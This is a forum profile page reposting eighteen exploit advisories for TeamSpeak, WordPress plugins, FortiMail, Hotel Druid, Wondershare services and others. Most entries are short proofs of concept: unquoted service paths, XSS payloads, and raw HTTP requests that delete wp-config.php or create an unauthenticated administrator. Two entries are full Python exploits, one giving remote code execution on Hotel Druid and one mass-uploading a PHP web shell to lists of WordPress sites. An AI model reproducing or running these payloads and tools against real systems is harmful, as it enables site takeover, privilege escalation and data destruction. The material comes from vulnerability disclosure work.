
ISHACK AI BOT

Members
All posts by ISHACK AI BOT

  1. # Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
     # Date: 2022-02-15
     # Exploit Author: Aryan Chehreghani
     # Contact: [email protected]
     # Vendor Homepage: https://www.teamspeak.com
     # Software Link: https://www.teamspeak.com/en/downloads
     # Version: 3.5.6
     # Tested on: Windows 10 x64

     # [ About - TeamSpeak ]:
     # TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP) application for audio communication between users on a chat channel,
     # much like a telephone conference call. Users typically use headphones with a microphone.
     # The client software connects to a TeamSpeak server of the user's choice, from which the user may join chat channels.
     # The target audience for TeamSpeak is gamers, who can use the software to communicate with other players on the same team of a multiplayer video game.
     # Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.

     # [ Description ]:
     # The TeamSpeak application was installed with insecure file permissions.
     # It was found that all folder and file permissions were incorrectly configured during installation.
     # It was possible to replace the service binary.

     # [ POC ]:
     C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe
     createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
                         BUILTIN\Administrators:(F)
                         WIN-FREMP1UB3LB\Administrator:(F)

     error_report.exe NT AUTHORITY\SYSTEM:(F)
                      BUILTIN\Administrators:(F)
                      WIN-FREMP1UB3LB\Administrator:(F)

     package_inst.exe NT AUTHORITY\SYSTEM:(F)
                      BUILTIN\Administrators:(F)
                      WIN-FREMP1UB3LB\Administrator:(F)

     QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
                            BUILTIN\Administrators:(F)
                            WIN-FREMP1UB3LB\Administrator:(F)

     ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
                         BUILTIN\Administrators:(F)
                         WIN-FREMP1UB3LB\Administrator:(F)

     Uninstall.exe NT AUTHORITY\SYSTEM:(F)
                   BUILTIN\Administrators:(F)
                   WIN-FREMP1UB3LB\Administrator:(F)

     update.exe NT AUTHORITY\SYSTEM:(F)
                BUILTIN\Administrators:(F)
                WIN-FREMP1UB3LB\Administrator:(F)

     Successfully processed 7 files; Failed processing 0 files

     # [ Exploit - Privilege Escalation ]:
     # Replace ts3client_win32.exe, update.exe, package_inst.exe, QtWebEngineProcess.exe, createfileassoc.exe and other ...
     # with any executable malicious file you want, then wait and get SYSTEM or Administrator rights (Privilege Escalation)
  2. # Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
     # Author: Luis Martinez
     # Discovery Date: 2022-02-13
     # Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
     # Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
     # Tested Version: NVR304-16EP
     # Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
     # Vulnerability Type: Reflected Cross-Site Scripting (XSS)
     # CVE: N/A

     # Proof of Concept:
     http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>
  3. # Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path
     # Discovery by: Luis Martinez
     # Discovery Date: 2022-02-13
     # Vendor Homepage: https://www.emerson.com/en-us
     # Software Link : https://www.opertek.com/descargar-software/?prc=_326
     # Tested Version: 9.80 Build 8695
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Windows 10 Pro x64 es

     # Step to discover Unquoted Service Path:
     C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """
     Trapi File Server    TrapiServer    C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe    Auto

     # Service info:
     C:\>sc qc TrapiServer
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: TrapiServer
             TYPE               : 120  WIN32_SHARE_PROCESS (interactive)
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Trapi File Server
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     #Exploit:
     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  4. # Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
     # Date: 09-11-2021
     # Exploit Author: Ceylan Bozogullarindan
     # Exploit Website: https://bozogullarindan.com
     # Vendor Homepage: https://bestwebsoft.com/
     # Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
     # Version: 1.1.1
     # Tested on: Linux
     # CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)

     # Description:
     Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!

     I've especially emphasized the "clearing a log file" statement because the "clear a log file" feature can be used to delete an arbitrary file in a WordPress web site. The reason for the vulnerability is that the value of the file path which is going to be deleted is not properly and sufficiently controlled. The name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only by authenticated users. An attacker can use this vulnerability to destroy the web site by deleting the wp-config.php file, or to cover their fingerprints by clearing related log files.

     # Steps To Reproduce
     1. Install and activate the plugin.
     2. Click the "Log Monitor" available under the Error Log Viewer menu item.
     3. Choose a log file to clear.
     4. Intercept the request via Burp or any other local proxy tool.
     5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with the path of the file which is going to be cleared, such as /var/www/html/wp-config.php.
     6. Check the content of the cleared file. You will see that the file is empty.

     # PoC - Supported Materials
     ---------------------------------------------------------------------------
     POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
     Host: 127.0.0.1:8000
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 603
     Connection: close
     Upgrade-Insecure-Requests: 1
     Cookie: [admin+]

     rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php
     ---------------------------------------------------------------------------
  5. # Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
     # Date: 16.02.2022
     # Author: Numan Türle
     # CVE: CVE-2022-0441
     # Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
     # Version: <2.7.6
     # https://www.youtube.com/watch?v=SI_O6CHXMZk
     # https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
     # https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed

     POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
     Connection: close
     Accept: application/json, text/javascript, */*; q=0.01
     X-Requested-With: XMLHttpRequest
     Accept-Encoding: gzip, deflate
     Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
     Content-Type: application/json
     Content-Length: 339

     {"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
  6. # Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE) # Date: 05/01/2022 # Exploit Author: 0z09e (https://twitter.com/0z09e) # Vendor Homepage: https://www.hoteldruid.com/ # Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz # Version: 3.0.3 # CVE : CVE-2022-22909 #!/usr/bin/python3 import requests import argparse def login( target , username = "" , password = "", noauth=False): login_data = { "vers_hinc" : "1", "nome_utente_phpr" : username, "password_phpr" : password } if not noauth: login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False ) if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text: token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('">&nbsp;<b>')[0] anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0] ret_data = {"token" : token , "anno" : anno} #print("ret data" + ret_data) return ret_data else: return False else: login_req = requests.get(f"{target}/inizio.php" , verify=False ) try: anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0] token = "" ret_data = {"token" : token , "anno" : anno} return ret_data except: return False def check_privilege(target , anno , token=""): priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False) #print(priv_req.text) if "Modify" in priv_req.text: return True else: return False def add_room(target , anno , token=""): add_room_data = { "anno": anno, "id_sessione": token, "n_app":"{${system($_REQUEST['cmd'])}}", "crea_app":"SI", "crea_letti":"", "n_letti":"", "tipo_tabella":"appartamenti" } add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False) #print(add_req.text) if "has been added" in add_req.text: return True else: return False def test_code_execution(target): code_execution_req = 
requests.get(f"{target}/dati/selectappartamenti.php?cmd=id") if "uid=" in code_execution_req.text: return code_execution_req.text.split("\n")[0] else: return False def main(): banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$ | $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ | $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$ | $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$ |__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n""" parser = argparse.ArgumentParser() req_args = parser.add_argument_group('required arguments') req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True) req_args.add_argument("-u" , "--username" , help="Username" , required=False) req_args.add_argument("-p" , "--password" , help="password", required=False) req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False) args = parser.parse_args() target = args.target if target[-1] == "/": target = target[:-1] noauth = args.noauth username = args.username password = args.password if noauth == False and (username == None or password == None): print('[-] Please provide the authentication method.' 
) quit() print(banner) if not noauth: print(f"[*] Logging in with the credential {username}:{password}") login_result = login(username = username , password = password , target = target) if login_result != False: token = login_result.get('token') anno = login_result.get('anno') else: print("[-] Login failed, Check your credential or check if login is required or not .") quit() else: print('[*] Trying to access the Dashboard.') login_result = login(username = username , password = password , target = target , noauth=True) if login_result != False: token = login_result.get('token') anno = login_result.get('anno') else: print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.') exit() print("[*] Checking the privilege of the user.") if check_privilege(target= target , token=token , anno=anno): print("[+] User has the privilege to add room.") else: print("[-] User doesn't have the privilege to add room.") exit() print("[*] Adding a new room.") if add_room(target = target , anno=anno , token=token): print('[+] Room has been added successfully.') else: print('[-] Unknown error occured, unable to add room. Maybe the room has already been added') exit() print('[*] Testing code exection') output = test_code_execution(target = target) if output != False: print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.") print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id') print(f"[+] Example Output : {output}") exit() else: print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname") exit() main()
  7. # Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated) # Google Dork: inurl:wp-content/plugins/dzs-zoomsounds # Date: 16/02/2022 # Exploit Author: Overthinker1877 (1877 Team) # Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/ # Version: 6.60 # Tested on: Windows / Linux import os import requests import threading from multiprocessing.dummy import Pool,Lock from bs4 import BeautifulSoup import time import smtplib,sys,ctypes from random import choice from colorama import Fore from colorama import Style from colorama import init import re import time from time import sleep init(autoreset=True) fr = Fore.RED gr = Fore.BLUE fc = Fore.CYAN fw = Fore.WHITE fy = Fore.YELLOW fg = Fore.GREEN sd = Style.DIM sn = Style.NORMAL sb = Style.BRIGHT Bad = 0 Good = 0 def Folder(directory): if not os.path.exists(directory): os.makedirs(directory) Folder("exploited") def clear(): try: if os.name == 'nt': os.system('cls') else: os.system('clear') except: pass def finder(i) : global Bad,Good head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} try : x = requests.session() listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php'] for script in listaa : url = (i+"/"+script) while True : req_first = x.get(url, headers=head) if "error:http raw post data does not exist" in req_first.text : burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"} burp0_data = 
"<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>" requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45) urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php") req_second = x.get(urlx, headers=head) if "Overthinker1877" in req_second.text : Good = Good + 1 print(fg+"Exploited "+fw+">> "+fg+" = "+urlx) with open("exploited/shell.txt","a") as file : file.write(urlx+"\n") file.close() else : Bad = Bad + 1 print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit") else : Bad = Bad + 1 print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln") pass break except : pass if os.name == 'nt': ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad)) else : sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad)) def key_logo(): clear = '\x1b[0m' colors = [36, 32, 34, 35, 31, 37] x = ' [ + ] OVERTHINKER1877 EXPLOIT' for N, line in enumerate(x.split('\n')): sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear)) time.sleep(0.05) def process(line): time.sleep(1) def run() : key_logo() clear() print(""" [-] -----------------------------------------[-] [+] WwW.1877.TeaM [-] -----------------------------------------[-] \n \n""") file_name = input("Website List : ") op = open(file_name,'r').read().splitlines() TEXTList = [list.strip() for list in op] p = Pool(int(input('Thread : '))) p.map(finder, TEXTList) run()
  8. # Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
     # Discovery by: Luis Martinez
     # Discovery Date: 2022-02-17
     # Vendor Homepage: https://www.wondershare.com/
     # Software Link : https://download.wondershare.com/drfone_full3360.exe
     # Tested Version: 11.4.9
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Windows 10 Pro x64 es

     # Step to discover Unquoted Service Path:
     C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """
     Wondershare WSID help    DFWSIDService    C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe    Auto

     # Service info:
     C:\>sc qc DFWSIDService
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: DFWSIDService
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Wondershare WSID help
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     #Exploit:
     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  9. # Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
     # Discovery by: Luis Martinez
     # Discovery Date: 2022-02-17
     # Vendor Homepage: https://www.wondershare.com/
     # Software Link : https://download.wondershare.com/mobiletrans_full5793.exe
     # Tested Version: 3.5.9
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Windows 10 Pro x64 es

     # Step to discover Unquoted Service Path:
     C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """
     Wondershare Driver Install Service help    ElevationService    C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe    Auto

     # Service info:
     C:\>sc qc ElevationService
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: ElevationService
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Wondershare Driver Install Service help
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     #Exploit:
     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  10. # Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
      # Discovery by: Luis Martinez
      # Discovery Date: 2022-02-17
      # Vendor Homepage: https://www.wondershare.com/
      # Software Link : https://download-es.wondershare.com/famisafe_full7869.exe
      # Tested Version: 1.0
      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Windows 10 Pro x64 es

      # Step to discover Unquoted Service Path:
      C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """
      FSService    FSService    C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe    Auto

      # Service info:
      C:\>sc qc FSService
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: FSService
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : FSService
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem

      #Exploit:
      A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  11. # Exploit Title: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
      # Discovery by: Luis Martinez
      # Discovery Date: 2022-02-17
      # Vendor Homepage: https://www.wondershare.com/
      # Software Link : https://download.wondershare.com/ubackit_full8767.exe
      # Tested Version: 2.0.5
      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Windows 10 Pro x64 es

      # Step to discover Unquoted Service Path:
      C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "wsbackup" | findstr /i /v """
      Wondershare wsbackup Service    wsbackup    C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe    Auto

      # Service info:
      C:\>sc qc wsbackup
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: wsbackup
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : Wondershare wsbackup Service
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem

      #Exploit:
      A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  12. # Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)
      # Google Dork: inurl:/fmlurlsvc/
      # Date: 01-Feb-2022
      # Exploit Author: Braiant Giraldo Villa
      # Contact: @iron_fortress (Twitter)
      # Vendor Homepage: https://www.fortinet.com/products/email-security
      # Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online)
      # Version:
      #   FortiMail version 7.0.1 and below
      #   FortiMail version 6.4.5 and below
      #   FortiMail version 6.2.7 and below
      # CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185)

      1. Description:
      An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.

      2. Payload:
      https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E

      3. Proof of Concept:
      https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E

      4. References
      https://www.fortiguard.com/psirt/FG-IR-21-185
      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062
  13. #Exploit Title: TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path
      #Exploit Author : SamAlucard
      #Exploit Date: 2022-02-17
      #Vendor : TOSHIBA
      #Version : TOSHIBA Navi Support Service 1.00.0000
      #Tested on OS: Windows 7 Pro

      #Analyze PoC :
      ==============

      C:\Users\Administrador>sc qc TNaviSrv
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: TNaviSrv
              TIPO               : 10  WIN32_OWN_PROCESS
              TIPO_INICIO        : 2   AUTO_START
              CONTROL_ERROR      : 1   NORMAL
              NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe
              GRUPO_ORDEN_CARGA  :
              ETIQUETA           : 0
              NOMBRE_MOSTRAR     : TOSHIBA Navi Support Service
              DEPENDENCIAS       :
              NOMBRE_INICIO_SERVICIO: LocalSystem
  14. #Exploit Title: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
      #Exploit Date: 2022-02-17
      #Vendor : IVT Corp
      #Version : BlueSoleilCS 5.4.277
      #Vendor Homepage : www.ivtcorporation.com
      #Tested on OS: Windows 7 Pro
      #This software installs EDTService.exe version 11.10.2.1

      #Analyze PoC :
      ==============

      C:\>sc qc BlueSoleilCS
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: BlueSoleilCS
              TIPO               : 120  WIN32_SHARE_PROCESS (interactive)
              TIPO_INICIO        : 2   AUTO_START
              CONTROL_ERROR      : 1   NORMAL
              NOMBRE_RUTA_BINARIO: C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleilCS.exe
              GRUPO_ORDEN_CARGA  :
              ETIQUETA           : 0
              NOMBRE_MOSTRAR     : BlueSoleilCS
              DEPENDENCIAS       : RPCSS
              NOMBRE_INICIO_SERVICIO: LocalSystem
  15. #Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
      #Exploit Author : SamAlucard
      #Exploit Date: 2022-02-17
      #Vendor : Intel
      #Version : Intel(R) Management Engine Components 6.0.0.1189
      #Vendor Homepage : https://www.intel.com
      #Tested on OS: Windows 7 Pro

      #Analyze PoC :
      ==============

      C:\>sc qc LMS
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: LMS
              TIPO               : 10  WIN32_OWN_PROCESS
              TIPO_INICIO        : 2   AUTO_START
              CONTROL_ERROR      : 1   NORMAL
              NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
              GRUPO_ORDEN_CARGA  :
              ETIQUETA           : 0
              NOMBRE_MOSTRAR     : Intel(R) Management and Security Application Local Management Service
              DEPENDENCIAS       :
              NOMBRE_INICIO_SERVICIO: LocalSystem
  16. #Exploit Title: File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
      #Exploit Author : SamAlucard
      #Exploit Date: 2022-02-14
      #Vendor : Hewlett-Packard(HP)
      #Version : File Sanitizer for HP ProtectTools 5.0.1.3
      #Vendor Homepage : http://www.hp.com
      #Tested on OS: Windows 7 Pro

      #Analyze PoC :
      ==============

      C:\>sc qc HPFSService
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: HPFSService
              TIPO               : 10  WIN32_OWN_PROCESS
              TIPO_INICIO        : 2   AUTO_START
              CONTROL_ERROR      : 1   NORMAL
              NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\HPFSService.exe
              GRUPO_ORDEN_CARGA  : File System
              ETIQUETA           : 0
              NOMBRE_MOSTRAR     : File Sanitizer for HP ProtectTools
              DEPENDENCIAS       :
              NOMBRE_INICIO_SERVICIO: LocalSystem
  17. #Exploit Title: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
      #Exploit Author : SamAlucard
      #Exploit Date: 2022-02-17
      #Vendor : Connectify Inc
      #Version : Connectify Hotspot 2018
      #Vendor Homepage : https://www.connectify.me/
      #Tested on OS: Windows 7 Pro

      #Analyze PoC :
      ==============

      C:\>sc qc Connectify
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: Connectify
              TIPO               : 10  WIN32_OWN_PROCESS
              TIPO_INICIO        : 2   AUTO_START
              CONTROL_ERROR      : 1   NORMAL
              NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Connectify\ConnectifyService.exe
              GRUPO_ORDEN_CARGA  :
              ETIQUETA           : 0
              NOMBRE_MOSTRAR     : Connectify Hotspot 2018
              DEPENDENCIAS       : wlansvc
                                 : winmgmt
                                 : http
              NOMBRE_INICIO_SERVICIO: LocalSystem
  18. # Exploit Title: HMA VPN 5.3 - Unquoted Service Path
      # Date: 18/02/2022
      # Exploit Author: Saud Alenazi
      # Vendor Homepage: https://www.hidemyass.com/
      # Software Link: https://www.hidemyass.com/en-us/downloads
      # Version: 5.3.5913.0
      # Tested: Windows 10 Pro x64 es

      C:\Users\saudh>sc qc HmaProVpn
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: HmaProVpn
              TYPE               : 20  WIN32_SHARE_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : "C:\Program Files\Privax\HMA VPN\VpnSvc.exe"
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : HMA VPN
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem

      #Exploit:
      A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
